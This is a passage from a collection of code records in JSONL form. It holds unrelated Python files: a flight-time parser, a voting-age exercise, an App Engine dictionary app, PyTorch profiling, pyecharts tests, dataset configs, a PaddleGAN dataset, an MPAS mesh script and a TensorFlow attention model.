time in h:m:s, date is removed\nfor t0 in time:\n time0 = t0.split('-')\n time0l.append(time0)\n\nfor i in range(len(time0l)):\n time1 = time0l[i][2]\n time1l.append(time1)\n\nfor t1 in time1l:\n time2 = t1.split(' ')\n time2l.append(time2)\n\nfor j in range(len(time2l)):\n time3 = time2l[j][1]\n time3l.append(time3)\n\nfor t3 in time3l:\n time4 = t3.split(':')\n time4l.append(time4)\n\n# Now the time is converted to floats\nfor k in range(len(time4l)):\n time5 = map(float,time4l[k])\n time5l.append(time5)\n\n# And the time is calculated in seconds, which is put in the final list called t\nfor l in range(len(time5l)):\n time6 = 3600*time5l[l][0] + 60*time5l[l][1] + time5l[l][2]\n t.append(time6)\n\n# If you're interested in a specific flight, use the code below to figure out when it occurs.\n# I believe the interval should then be [first point +1:last point +2]\n\n##for p in range(len(callsign)):\n## if callsign[p] == 'TRA883':\n## print p\n\n","sub_path":"Datareading.py","file_name":"Datareading.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
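The seven intermediate lists in the record above boil down to one transformation: take the clock portion of a timestamp shaped like "YYYY-MM-DD HH:MM:SS[.fff]" and convert it to seconds since midnight. Assuming that format, the same result in one pass:

def seconds_since_midnight(timestamp):
    # "2013-07-01 12:34:56.78" -> 45296.78
    clock = timestamp.split(' ')[1]
    h, m, s = (float(part) for part in clock.split(':'))
    return 3600 * h + 60 * m + s

t = [seconds_since_midnight(t0) for t0 in time]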
+{"seq_id":"245869280","text":"# function to determine whether voting is mandatory\n\ndef idade(a):\n from datetime import date\n return date.today().year - a\n\n\ndef voto(i):\n if i < 16:\n return 'Denied'\n elif 18 <= i < 65:\n return 'Mandatory'\n else:\n return 'Optional'\n\n\nano = int(input('In what year were you born? '))\nidade(ano) # computes just the age\nsituacao = voto(idade(ano)) # situacao receives the result of the voto function, which takes as its parameter\n# the person's age, computed by the other function.\nprint(f'You are {idade(ano)} years old: Voting {situacao}.')\n","sub_path":"CursoEmVideo/pythonProject/ex101.py","file_name":"ex101.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"302790781","text":"t = int(input())\nfor i in range(t):\n l = input()\n arr = input()\n arr = [int(k) for k in arr.split(\" \")]\n arr.sort()\n if arr[-1] % arr[0] == 0:\n print(arr[-1])\n else:\n if arr[-1] % 2 == 0 and arr[0] % 2 == 0:\n arr[0] //= 2\n print(arr[0] * arr[-1])\n","sub_path":"Code/CodeRecords/2779/49361/295192.py","file_name":"295192.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"19197086","text":"from google.appengine.api import users\r\nfrom google.appengine.ext import ndb\r\n\r\nimport webapp2\r\n\r\nfrom mydicts import *\r\nfrom myschemas import *\r\nfrom myadmin import *\r\n\r\nfrom wordtemplates import *\r\nfrom utils import *\r\nfrom modelutils import *\r\n\r\ndef deleteword(request,wordid):\r\n dict_name = request.request.get('dict_name', WORDDICT)\r\n word_key = ndb.Key(urlsafe=wordid)\r\n word = word_key.get()\r\n word.key.delete()\r\n\r\ndef clearwords(request):\r\n words_query = Word.query()\r\n words = words_query.fetch()\r\n \r\n for word in words:\r\n deleteword(request,word.key.urlsafe())\r\n\r\n# [START ListWords]\r\nclass ListWords(webapp2.RequestHandler):\r\n def get(self):\r\n self.response.write('')\r\n\r\n sdict_name = self.request.get('dict_name',WORDDICT)\r\n cdict_name = self.request.get('dict_name',CHICHARDICT)\r\n\r\n words_query = Word.query(ancestor=dict_key(sdict_name)).order(-Word.date)\r\n words = words_query.fetch()\r\n\r\n wordlist = \"\"\r\n wordlist = wordlist + \"\"\r\n for word in words:\r\n wordlist = wordlist + \"\\n\" + word.chichar +\" \" + word.translation + \" \"\r\n for ochichar in getwordchichars(self,word):\r\n wordlist = wordlist + \"\" + ochichar.chichar + \" \"\r\n viewwordform = \"\"\r\n wordlist = wordlist + \"\" + viewwordform + \" \"\r\n wordlist = wordlist + \" \"\r\n wordlist = wordlist + \"
\"\r\n\r\n self.response.write(LIST_WORD_TEMPLATE % wordlist)\r\n\r\n self.response.write('')\r\n# [END ListWords]\r\n\r\n\r\n# [END LoadWords]\r\n\r\ndef clearwords(request):\r\n word = Word()\r\n words_query = Word.query()\r\n words = words_query.fetch()\r\n \r\n for word in words:\r\n deleteword(request,word.key.urlsafe())\r\n \r\n\r\n# [START ClearWords]\r\nclass ClearWords(webapp2.RequestHandler):\r\n def post(self):\r\n clearwords(self)\r\n self.redirect('/')\r\n# [END ClearWords]\r\n\r\n# [START ViewWord]\r\nclass ViewWord(webapp2.RequestHandler):\r\n def get(self,wordid):\r\n self.response.write('')\r\n\r\n #dict_name = self.request.get('dict_name', WORDDICT)\r\n #word = Word(parent=dict_key(dict_name));\r\n\r\n\r\n dict_name = self.request.get('dict_name',WORDDICT)\r\n word_key = ndb.Key(urlsafe=wordid)\r\n #sandy = sandy_key.get()\r\n #key = ndb.Key(Word, wordid)\r\n #words_query = Word.query(Word.key == key)\r\n #word = words_query.fetch(1)[0]\r\n word = word_key.get()\r\n\r\n user = users.get_current_user()\r\n\r\n if user:\r\n udict_name = self.request.get('dict_name', USERDICT)\r\n viewstat = ViewStat(parent=dict_key(udict_name))\r\n viewstat.email = user.email()\r\n viewstat.word = word\r\n viewstat.put()\r\n\r\n \r\n wordchars = \"\"\r\n for chichar10 in lsplit(getwordchichars(self,word),10):\r\n wordchars = wordchars + \"\"\r\n for lchichar in chichar10:\r\n chichars_query = Chichar.query(Chichar.chichar == lchichar.chichar)\r\n qresult = chichars_query.fetch(1)\r\n chichar = qresult[0]\r\n wordchars = wordchars + \" \"\r\n wordchars = wordchars + \" \"\r\n wordchars = wordchars + \"
\"\r\n\r\n if not user == None and user.email() == ADMIN_ID:\r\n self.response.write(VIEW_WORD_ADMIN_TEMPLATE % ( word.chichar, word.pronunciation, word.translation, wordchars, word.key.urlsafe(),word.key.urlsafe()))\r\n else:\r\n self.response.write(VIEW_WORD_USER_TEMPLATE % ( word.chichar, word.pronunciation, word.translation, wordchars))\r\n \r\n\r\n self.response.write('')\r\n# [END ViewWord]\r\n\r\n# [START AddWord]\r\nclass AddWord(webapp2.RequestHandler):\r\n def get(self):\r\n user = users.get_current_user()\r\n if not user == None and user.email() == ADMIN_ID:\r\n self.response.write('')\r\n self.response.write(ADD_WORD_TEMPLATE)\r\n self.response.write('')\r\n else:\r\n self.response.write('Sorry, you must be ADMIN to access this page')\r\n# [END AddWord]\r\n\r\n# [START DoAddWord]\r\nclass DoAddWord(webapp2.RequestHandler):\r\n def post(self):\r\n dict_name = self.request.get('dict_name', WORDDICT)\r\n word = Word(parent=dict_key(dict_name));\r\n word.chichar = self.request.get('wordchichar')\r\n word.translation = self.request.get('wordtranslation')\r\n word.pronunciation = self.request.get('wordpronunciation')\r\n word.put()\r\n\r\n self.redirect(\"/viewword/\" + word.key.urlsafe())\r\n# [END DoAddWord]\r\n\r\n\r\n# [START EditWord]\r\nclass EditWord(webapp2.RequestHandler):\r\n def get(self,wordid):\r\n self.response.write('')\r\n\r\n dict_name = self.request.get('dict_name', WORDDICT)\r\n word_key = ndb.Key(urlsafe=wordid)\r\n # word = Word(parent=dict_key(dict_name));\r\n word = word_key.get()\r\n\r\n # Write the submission form and the footer of the page\r\n self.response.write(EDIT_WORD_TEMPLATE % ( word.key.urlsafe(), word.chichar, word.translation, word.pronunciation,word.key.urlsafe()))\r\n\r\n self.response.write('')\r\n\r\n# [END EditWord]\r\n\r\n# [START SaveWord]\r\nclass SaveWord(webapp2.RequestHandler):\r\n def post(self,wordid):\r\n save = self.request.get('save')\r\n cancel = self.request.get('cancel')\r\n dict_name = self.request.get('dict_name', WORDDICT)\r\n word_key = ndb.Key(urlsafe=wordid)\r\n # word = Word(parent=dict_key(dict_name));\r\n word = word_key.get()\r\n \r\n if save:\r\n word.chichar = self.request.get('word')\r\n word.translation = self.request.get('translation')\r\n word.pronunciation = self.request.get('pronunciation')\r\n word.put()\r\n\r\n self.redirect(\"/viewword/\" + word.key.urlsafe())\r\n# [END SaveWord]\r\n \r\ndef deleteword(request,wordid):\r\n dict_name = request.request.get('dict_name', WORDDICT)\r\n word_key = ndb.Key(urlsafe=wordid)\r\n word = word_key.get()\r\n word.key.delete()\r\n\r\n\r\n# [START DeleteWord]\r\nclass DeleteWord(webapp2.RequestHandler):\r\n def post(self,wordid):\r\n deleteword(self,wordid)\r\n self.redirect(\"/listwords\")\r\n# [END DeleteWord]\r\n\r\n# [START StatWords]\r\nclass StatWords(webapp2.RequestHandler):\r\n def get(self):\r\n self.response.write('')\r\n \r\n dict_name = self.request.get('dict_name',WORDDICT)\r\n words_query = Word.query(ancestor=dict_key(dict_name)).order(-Word.date)\r\n words = words_query.fetch()\r\n\r\n # Write the submission form and the footer of the page\r\n self.response.write(STAT_WORD_TEMPLATE % ( len(words) ))\r\n\r\n self.response.write('')\r\n# [END StatChiChars]\r\n\r\n","sub_path":"word.py","file_name":"word.py","file_ext":"py","file_size_in_byte":7436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
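ViewWord in the record above leans on an lsplit helper (imported from utils, not shown in this record) to lay the characters out ten per table row. A plausible sketch, assuming it simply chunks a list into fixed-size slices:

def lsplit(items, size):
    """Split `items` into consecutive chunks of at most `size` elements."""
    return [items[i:i + size] for i in range(0, len(items), size)]

print(lsplit([1, 2, 3, 4, 5, 6, 7], 3))  # [[1, 2, 3], [4, 5, 6], [7]]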
+{"seq_id":"43820261","text":"import torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport torch.utils.data\nimport torchvision\nimport torchvision.transforms as T\nimport torchvision.datasets as datasets\nimport torchvision.models as models\n\n\nprint (torch.__version__)\n\n# model in pytorch repo with weights \nmodel = models.resnet50(pretrained=True)\nmodel.cuda() # load in GPU\ncudnn.benchmark = True #? needed for profiler? \n\n# pre-process images\ntransform = T.Compose([T.Resize(256), T.CenterCrop(224), T.ToTensor()])\n# Dataset load \ntrainset = torchvision.datasets.CIFAR10(root='./data', train=True, \n download=True, transform=transform)\n# Loading ( parallel workers processes - GIL problem global lock - not running in threads) \ntrainloader = torch.utils.data.DataLoader(trainset, batch_size=8,\n shuffle=True)\n# calc loss (target and training) - and minimize it\ncriterion = nn.CrossEntropyLoss().cuda()\n# back propagation \noptimizer = torch.optim.SGD(model.parameters(), lr=0.001, momentum=0.9)\n\ndevice = torch.device(\"cuda:0\")\n# switch to training mode\nmodel.train()\n\n\nimport torch.profiler\n\ndef output_fn(p):\n p.export_chrome_trace(\"./trace/worker0-batch8/worker0.pt.trace.json\")\n \n# add context manager around training loop\nwith torch.profiler.profile(\n activities=[\n torch.profiler.ProfilerActivity.CPU,\n torch.profiler.ProfilerActivity.CUDA],\n schedule=torch.profiler.schedule(\n wait=2, # skip first 2 training steps\n warmup=2, # reach steady and skip few layers, profiling happens ignores results\n active=6), # only profile 6 steps - allows to focus and skip some layers for reducing overhead(even in prod)\n on_trace_ready=output_fn,\n record_shapes=True\n) as p:\n for step, data in enumerate(trainloader, 0):\n print(\"step:{}\".format(step))\n inputs, labels = data[0].to(device=device), data[1].to(device=device)\n\n outputs = model(inputs)\n loss = criterion(outputs, labels)\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n # next training step (metadata)\n p.step() \n if step + 1 >= 10:\n break\n","sub_path":"resnet50basic.py","file_name":"resnet50basic.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
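With schedule(wait=2, warmup=2, active=6) in the record above, the first two steps are skipped, the next two warm the profiler up without being recorded, and only the six steps after that are captured, which is why the loop stops at ten. Besides the Chrome trace written by output_fn, a quick console summary can be printed once the context manager has exited:

# Aggregate the recorded events and show the ten most expensive ops by GPU time.
print(p.key_averages().table(sort_by="cuda_time_total", row_limit=10))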
+{"seq_id":"174360570","text":"from nose.tools import assert_equal\n\nfrom pyecharts.commons.utils import remove_key_with_none_value\nfrom pyecharts.options.global_options import (\n AnimationOpts,\n InitOpts,\n ToolBoxFeatureBrushOpts,\n ToolBoxFeatureDataViewOpts,\n ToolBoxFeatureDataZoomOpts,\n ToolBoxFeatureMagicTypeOpts,\n ToolBoxFeatureOpts,\n ToolBoxFeatureRestoreOpts,\n ToolBoxFeatureSaveAsImageOpts,\n ToolboxOpts,\n BrushOpts,\n DataZoomOpts,\n LegendOpts,\n VisualMapOpts,\n TooltipOpts,\n)\n\n\ndef test_animation_options_remove_none():\n option = AnimationOpts()\n expected = {\n \"animation\": True,\n \"animationDelay\": 0,\n \"animationDelayUpdate\": 0,\n \"animationDuration\": 1000,\n \"animationDurationUpdate\": 300,\n \"animationEasing\": \"cubicOut\",\n \"animationEasingUpdate\": \"cubicOut\",\n \"animationThreshold\": 2000,\n }\n assert_equal(expected, remove_key_with_none_value(option.opts))\n\n\ndef test_init_options_remove_none():\n option = InitOpts(animation_opts={})\n expected = {\n \"animationOpts\": {},\n \"height\": \"500px\",\n \"page_title\": \"Awesome-pyecharts\",\n \"renderer\": \"canvas\",\n \"theme\": \"white\",\n \"width\": \"900px\",\n }\n assert_equal(expected, remove_key_with_none_value(option.opts))\n\n\ndef test_toolbox_feature_options_remove_none():\n save_as_image = ToolBoxFeatureSaveAsImageOpts()\n restore = ToolBoxFeatureRestoreOpts()\n data_view = ToolBoxFeatureDataViewOpts()\n data_zoom = ToolBoxFeatureDataZoomOpts()\n magic_type = ToolBoxFeatureMagicTypeOpts()\n brush = ToolBoxFeatureBrushOpts()\n\n option = ToolBoxFeatureOpts(\n save_as_image=save_as_image,\n restore=restore,\n data_view=data_view,\n data_zoom=data_zoom,\n magic_type=magic_type,\n brush=brush,\n )\n expected = {\n \"saveAsImage\": save_as_image,\n \"restore\": restore,\n \"dataView\": data_view,\n \"dataZoom\": data_zoom,\n \"magicType\": magic_type,\n \"brush\": brush,\n }\n assert_equal(expected, remove_key_with_none_value(option.opts))\n\n\ndef test_toolbox_options_remove_none():\n option = ToolboxOpts(feature={})\n expected = {\n \"show\": True,\n \"orient\": \"horizontal\",\n \"itemSize\": 15,\n \"itemGap\": 10,\n \"left\": \"80%\",\n \"feature\": {},\n }\n assert_equal(expected, remove_key_with_none_value(option.opts))\n\n\ndef test_brush_options_remove_none():\n option = BrushOpts()\n expected = {\n \"brushMode\": \"single\",\n \"brushStyle\": {\n \"borderColor\": \"rgba(120,140,180,0.8)\",\n \"borderWidth\": 1,\n \"color\": \"rgba(120,140,180,0.3)\",\n },\n \"brushType\": \"rect\",\n \"removeOnClick\": True,\n \"throttleDelay\": 0,\n \"throttleType\": \"fixRate\",\n \"toolbox\": [\"rect\", \"polygon\", \"keep\", \"clear\"],\n \"transformable\": True,\n }\n assert_equal(expected, remove_key_with_none_value(option.opts))\n\n\ndef test_data_zoom_options_remove_none():\n option = DataZoomOpts()\n expected = {\n \"end\": 80,\n \"filterMode\": \"filter\",\n \"orient\": \"horizontal\",\n \"realtime\": True,\n \"show\": True,\n \"start\": 20,\n \"type\": \"slider\",\n \"zoomLock\": False,\n }\n assert_equal(expected, remove_key_with_none_value(option.opts))\n\n\ndef test_legend_options_remove_none():\n option = LegendOpts()\n expected = {\n \"show\": True,\n \"padding\": 5,\n \"itemGap\": 10,\n \"itemWidth\": 25,\n \"itemHeight\": 14,\n }\n assert_equal(expected, remove_key_with_none_value(option.opts))\n\n\ndef test_visual_map_options_remove_none():\n option = VisualMapOpts()\n expected = {\n \"calculable\": True,\n \"inRange\": {\"color\": [\"#50a3ba\", \"#eac763\", 
\"#d94e5d\"]},\n \"itemHeight\": 140,\n \"itemWidth\": 20,\n \"max\": 100,\n \"min\": 0,\n \"orient\": \"vertical\",\n \"show\": True,\n \"showLabel\": True,\n \"inverse\": False,\n \"splitNumber\": 5,\n \"type\": \"continuous\",\n \"borderWidth\": 0,\n }\n assert_equal(expected, remove_key_with_none_value(option.opts))\n\n\ndef test_tool_tip_options_remove_none():\n option = TooltipOpts(textstyle_opts=None)\n expected = {\n \"alwaysShowContent\": False,\n \"axisPointer\": {\"type\": \"line\"},\n \"borderWidth\": 0,\n \"hideDelay\": 100,\n \"padding\": 5,\n \"show\": True,\n \"showContent\": True,\n \"showDelay\": 0,\n \"trigger\": \"item\",\n \"triggerOn\": \"mousemove|click\",\n }\n assert_equal(expected, remove_key_with_none_value(option.opts))\n","sub_path":"test/test_global_options.py","file_name":"test_global_options.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
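Every test above funnels the option dict through remove_key_with_none_value before comparing. A sketch of the contract the assertions rely on, recursively dropping entries whose value is None; this is an illustration of the behavior, not pyecharts' actual source:

def drop_none(obj):
    """Recursively remove dict entries whose value is None."""
    if isinstance(obj, dict):
        return {k: drop_none(v) for k, v in obj.items() if v is not None}
    if isinstance(obj, list):
        return [drop_none(v) for v in obj]
    return obj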
+{"seq_id":"474658209","text":"import os\nfrom Configs import ConfigBase\n\n# define different classes per environment\n\n\nclass DEFAULT(ConfigBase):\n # commit every n files\n COMMIT_INTERVAL = 100\n\n SCRIPT_DIR = os.path.dirname(\n os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__)))\n )\n\n DATA_BASE_DIR = os.path.join(SCRIPT_DIR, \"dataset/\")\n DATA_DIRS = [\n \"biorxiv_medrxiv\",\n \"comm_use_subset\",\n \"noncomm_use_subset\",\n \"custom_license\",\n ]\n METADATA_FILE = os.path.join(DATA_BASE_DIR, \"metadata.csv\")\n\n # Override label names\n JSON2GRAPH_LABELOVERRIDE = {\n \"authors\": \"Author\",\n }\n\n JSON2GRAPH_PROPOVERRIDE = {\n \"Doi\": {\"DOI\": \"id\"},\n \"Arxiv\": {\"arXiv\": \"id\"},\n \"Pmcid\": {\"PMCID\": \"id\"},\n \"Pmid\": {\"PMID\": \"id\"},\n }\n\n JSON2GRAPH_GENERATED_HASH_ID_ATTR_NAME = \"_hash_id\"\n # Define for which labels and how a hash id attr should be generated\n JSON2GRAPH_GENERATED_HASH_IDS = {\n \"Abstract\": [\"text\"], # Generate an id based on the property \"text\"\n \"Affiliation\": \"AllAttributes\", # Generate an id based all properties\n \"Author\": \"AllAttributes\",\n \"Back_matter\": \"AllAttributes\",\n \"Bibref\": \"AllAttributes\",\n \"Bib_entries\": \"AllInnerContent\", # Generate an id based all attr and childrens attr\n \"Body_text\": \"AllAttributes\",\n \"Cite_spans\": \"AllInnerContent\",\n \"Figref\": \"AllAttributes\",\n \"Location\": \"AllAttributes\",\n \"Metadata\": \"AllInnerContent\",\n \"Other_ids\": \"AllInnerContent\",\n \"Ref_entries\": \"AllInnerContent\",\n \"Ref_spans\": \"AllInnerContent\",\n \"Tabref\": \"AllAttributes\",\n }\n\n # Define which properties can be taken as primary key for specific labels\n # {\"label\":\"attribute-that-works-as-id\"}\n JSON2GRAPH_ID_ATTR = {\n \"Arxiv\": \"id\",\n \"Doi\": \"id\",\n \"Paper\": \"paper_id\",\n \"Pmcid\": \"id\",\n \"Pmid\": \"id\",\n }\n JSON2GRAPH_CONCAT_LIST_ATTR = {\"middle\": \" \"}\n JSON2GRAPH_COLLECTION_NODE_LABEL = \"CollectionHub\"\n\n\n# All following config classes inherit from DEFAULT\nclass PRODUCTION(DEFAULT):\n pass\n\n\nclass DEVELOPMENT(DEFAULT):\n COMMIT_INTERVAL = 2\n DATA_BASE_DIR = os.path.join(DEFAULT.SCRIPT_DIR, \"testdataset/\")\n DATA_DIRS = [\n \"test\",\n ]\n METADATA_FILE = os.path.join(DATA_BASE_DIR, \"metadata.csv\")\n","sub_path":"dataloader/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
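JSON2GRAPH_GENERATED_HASH_IDS in the config above declares, per node label, which scope feeds the synthetic _hash_id attribute ("text" only, all attributes, or all inner content). A sketch of how such an id could be derived for the attribute-based cases; the helper is illustrative, since the loader's real implementation is not part of this record:

import hashlib

def generate_hash_id(node_props, attr_names):
    """Deterministic id from the selected, sorted node properties."""
    raw = "|".join(str(node_props.get(name, "")) for name in sorted(attr_names))
    return hashlib.md5(raw.encode("utf-8")).hexdigest()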
+{"seq_id":"36115775","text":"# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport cv2\nimport paddle\nimport os.path\nfrom .base_dataset import BaseDataset, get_params, get_transform\nfrom .image_folder import make_dataset\n\nfrom .builder import DATASETS\nfrom .transforms.builder import build_transforms\n\n\n@DATASETS.register()\nclass PairedDataset(BaseDataset):\n \"\"\"A dataset class for paired image dataset.\n \"\"\"\n def __init__(self, cfg):\n \"\"\"Initialize this dataset class.\n\n Args:\n cfg (dict): configs of datasets.\n \"\"\"\n BaseDataset.__init__(self, cfg)\n self.dir_AB = os.path.join(cfg.dataroot,\n cfg.phase) # get the image directory\n self.AB_paths = sorted(make_dataset(\n self.dir_AB, cfg.max_dataset_size)) # get image paths\n\n self.input_nc = self.cfg.output_nc if self.cfg.direction == 'BtoA' else self.cfg.input_nc\n self.output_nc = self.cfg.input_nc if self.cfg.direction == 'BtoA' else self.cfg.output_nc\n self.transforms = build_transforms(cfg.transforms)\n\n def __getitem__(self, index):\n \"\"\"Return a data point and its metadata information.\n\n Parameters:\n index - - a random integer for data indexing\n\n Returns a dictionary that contains A, B, A_paths and B_paths\n A (tensor) - - an image in the input domain\n B (tensor) - - its corresponding image in the target domain\n A_paths (str) - - image paths\n B_paths (str) - - image paths (same as A_paths)\n \"\"\"\n # read a image given a random integer index\n AB_path = self.AB_paths[index]\n AB = cv2.cvtColor(cv2.imread(AB_path), cv2.COLOR_BGR2RGB)\n\n # split AB image into A and B\n h, w = AB.shape[:2]\n # w, h = AB.size\n w2 = int(w / 2)\n\n A = AB[:h, :w2, :]\n B = AB[:h, w2:, :]\n\n # apply the same transform to both A and B\n A, B = self.transforms((A, B))\n\n return {'A': A, 'B': B, 'A_paths': AB_path, 'B_paths': AB_path}\n\n def __len__(self):\n \"\"\"Return the total number of images in the dataset.\"\"\"\n return len(self.AB_paths)\n","sub_path":"ppgan/datasets/paired_dataset.py","file_name":"paired_dataset.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"590106962","text":"#!/usr/bin/env python\n\"\"\"\n% Create cell width for this mesh on a regular latitude-longitude grid.\n% Outputs:\n% cellWidth - m x n array, entries are desired cell width in km\n% lon - longitude, vector of length m, with entries between -180 and 180, degrees\n% lat - latitude, vector of length n, with entries between -90 and 90, degrees\n\"\"\"\nimport numpy as np\nimport jigsaw_to_MPAS.mesh_definition_tools as mdt\n\n\ndef cellWidthVsLatLon():\n\n ddeg = 0.1\n\n lat = np.arange(-90, 90.01, ddeg)\n lon = np.arange(-180, 180.01, ddeg)\n\n cellWidthSouth = 15 * np.ones(lat.size)\n cellWidthNorth = 60 * np.ones(lat.size)\n latTransition = -30\n latWidthTransition = 5\n\n cellWidthVsLat = mdt.mergeCellWidthVsLat(\n lat,\n cellWidthSouth,\n cellWidthNorth,\n latTransition,\n latWidthTransition)\n\n cellWidth = np.ones((lat.size, lon.size))\n for i in range(lon.size):\n cellWidth[:, i] = cellWidthVsLat\n\n #print 'cellWidthSouth', cellWidthSouth\n #print 'cellWidthNorth', cellWidthNorth\n #print 'cellWidthVsLat', cellWidthVsLat\n\n return cellWidth, lon, lat\n","sub_path":"testing_and_setup/compass/ocean/global_ocean/SOQU60to15/init/define_base_mesh.py","file_name":"define_base_mesh.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
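mergeCellWidthVsLat in the record above blends the 15 km southern profile into the 60 km northern one around latTransition = -30, over a band roughly latWidthTransition degrees wide. A sketch of that blend as a smooth tanh ramp, matching the call signature above; the exact smoothing used by jigsaw_to_MPAS is an assumption:

import numpy as np

def merge_cell_width_vs_lat(lat, width_south, width_north,
                            lat_transition, lat_width_transition):
    # frac goes from 0 well south of the transition to 1 well north of it.
    frac = 0.5 * (np.tanh((lat - lat_transition) / lat_width_transition) + 1.0)
    return (1.0 - frac) * width_south + frac * width_north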
+{"seq_id":"185522591","text":"import numpy as np\nimport typing\nfrom typing import Any, Tuple\nimport tensorflow as tf\nfrom tensorflow.keras.layers.experimental import preprocessing\nimport tensorflow_text as tf_text\nfrom src.interpreter.attention_auto_encoder.shape_checker import *\n\n\n\n\nclass Encoder(tf.keras.layers.Layer):\n def __init__(self, input_vocab_size, embedding_dim, enc_units):\n super(Encoder, self).__init__()\n self.enc_units = enc_units\n self.input_vocab_size = input_vocab_size\n\n # The embedding layer converts tokens to vectors\n self.embedding = tf.keras.layers.Embedding(self.input_vocab_size,\n embedding_dim)\n\n # The GRU RNN layer processes those vectors sequentially.\n self.gru = tf.keras.layers.GRU(self.enc_units,\n # Return the sequence and state\n return_sequences=True,\n return_state=True,\n recurrent_initializer='glorot_uniform')\n\n def call(self, tokens, state=None):\n shape_checker = ShapeChecker()\n shape_checker(tokens, ('batch', 's'))\n\n # 2. The embedding layer looks up the embedding for each token.\n vectors = self.embedding(tokens)\n shape_checker(vectors, ('batch', 's', 'embed_dim'))\n\n # 3. The GRU processes the embedding sequence.\n # output shape: (batch, s, enc_units)\n # state shape: (batch, enc_units)\n output, state = self.gru(vectors, initial_state=state)\n shape_checker(output, ('batch', 's', 'enc_units'))\n shape_checker(state, ('batch', 'enc_units'))\n\n # 4. Returns the new sequence and its state.\n return output, state\n\nclass BahdanauAttention(tf.keras.layers.Layer):\n def __init__(self, units):\n super().__init__()\n # For Eqn. (4), the Bahdanau attention\n self.W1 = tf.keras.layers.Dense(units, use_bias=False)\n self.W2 = tf.keras.layers.Dense(units, use_bias=False)\n\n self.attention = tf.keras.layers.AdditiveAttention()\n\n def call(self, query, value, mask):\n shape_checker = ShapeChecker()\n shape_checker(query, ('batch', 't', 'query_units'))\n shape_checker(value, ('batch', 's', 'value_units'))\n shape_checker(mask, ('batch', 's'))\n\n # From Eqn. (4), `W1@ht`.\n w1_query = self.W1(query)\n shape_checker(w1_query, ('batch', 't', 'attn_units'))\n\n # From Eqn. (4), `W2@hs`.\n w2_key = self.W2(value)\n shape_checker(w2_key, ('batch', 's', 'attn_units'))\n\n query_mask = tf.ones(tf.shape(query)[:-1], dtype=bool)\n value_mask = mask\n\n context_vector, attention_weights = self.attention(\n inputs = [w1_query, value, w2_key],\n mask=[query_mask, value_mask],\n return_attention_scores = True,\n )\n shape_checker(context_vector, ('batch', 't', 'value_units'))\n shape_checker(attention_weights, ('batch', 't', 's'))\n\n return context_vector, attention_weights\n\nclass Decoder(tf.keras.layers.Layer):\n def __init__(self, output_vocab_size, embedding_dim, dec_units):\n super(Decoder, self).__init__()\n self.dec_units = dec_units\n self.output_vocab_size = output_vocab_size\n self.embedding_dim = embedding_dim\n\n # For Step 1. The embedding layer convets token IDs to vectors\n self.embedding = tf.keras.layers.Embedding(self.output_vocab_size,\n embedding_dim)\n\n # For Step 2. The RNN keeps track of what's been generated so far.\n self.gru = tf.keras.layers.GRU(self.dec_units,\n return_sequences=True,\n return_state=True,\n recurrent_initializer='glorot_uniform')\n\n # For step 3. The RNN output will be the query for the attention layer.\n self.attention = BahdanauAttention(self.dec_units)\n\n # For step 4. Eqn. 
(3): converting `ct` to `at`\n self.Wc = tf.keras.layers.Dense(dec_units, activation=tf.math.tanh,\n use_bias=False)\n\n # For step 5. This fully connected layer produces the logits for each\n # output token.\n self.fc = tf.keras.layers.Dense(self.output_vocab_size)\n\n\n\n\n def call(self,\n inputs,\n state=None):\n shape_checker = ShapeChecker()\n shape_checker(inputs.new_tokens, ('batch', 't'))\n shape_checker(inputs.enc_output, ('batch', 's', 'enc_units'))\n shape_checker(inputs.mask, ('batch', 's'))\n\n if state is not None:\n shape_checker(state, ('batch', 'dec_units'))\n\n # Step 1. Lookup the embeddings\n vectors = self.embedding(inputs.new_tokens)\n shape_checker(vectors, ('batch', 't', 'embedding_dim'))\n\n # Step 2. Process one step with the RNN\n rnn_output, state = self.gru(vectors, initial_state=state)\n\n shape_checker(rnn_output, ('batch', 't', 'dec_units'))\n shape_checker(state, ('batch', 'dec_units'))\n\n # Step 3. Use the RNN output as the query for the attention over the\n # encoder output.\n context_vector, attention_weights = self.attention(\n query=rnn_output, value=inputs.enc_output, mask=inputs.mask)\n shape_checker(context_vector, ('batch', 't', 'dec_units'))\n shape_checker(attention_weights, ('batch', 't', 's'))\n\n # Step 4. Eqn. (3): Join the context_vector and rnn_output\n # [ct; ht] shape: (batch t, value_units + query_units)\n context_and_rnn_output = tf.concat([context_vector, rnn_output], axis=-1)\n\n # Step 4. Eqn. (3): `at = tanh(Wc@[ct; ht])`\n attention_vector = self.Wc(context_and_rnn_output)\n shape_checker(attention_vector, ('batch', 't', 'dec_units'))\n\n # Step 5. Generate logit predictions:\n logits = self.fc(attention_vector)\n shape_checker(logits, ('batch', 't', 'output_vocab_size'))\n\n return DecoderOutput(logits, attention_weights), 